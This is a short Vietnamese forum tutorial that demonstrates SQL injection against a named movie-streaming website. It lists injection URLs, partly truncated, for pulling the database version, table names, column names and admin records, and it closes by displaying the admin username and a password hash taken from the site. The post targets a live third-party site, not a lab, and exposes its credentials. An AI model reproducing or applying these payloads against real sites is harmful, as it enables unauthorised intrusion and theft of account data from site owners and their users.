Skip to main content

[TUT] - SQL http://phim.haylem.net (fake HTML)

Cũng là Rewrite đuôi thành HTML.

Tutorial:

Get version
http://phim.haylem.net/the-loai/Hanh...7e,version()))
and 'a'='a/page-1.html

Get table

http://phim.haylem.net/the-loai/Hanh...se()+limit+0,1
))) and 'a'='a/page-1.html
Thay limit 0,1 bởi limit 1,1 ..... limit 12,1 ta được tất cả table

Get column

http://phim.haylem.net/the-loai/Hanh...6572+limit+2,1
))) and 'a'='a/page-1.html

Get data admin

http://phim.haylem.net/the-loai/Hanh...user+limit+0,1
))) and 'a'='a/page-1.html

Ta được:
 
admin|b56f4ab266bd60dc6e8ff73ed

Share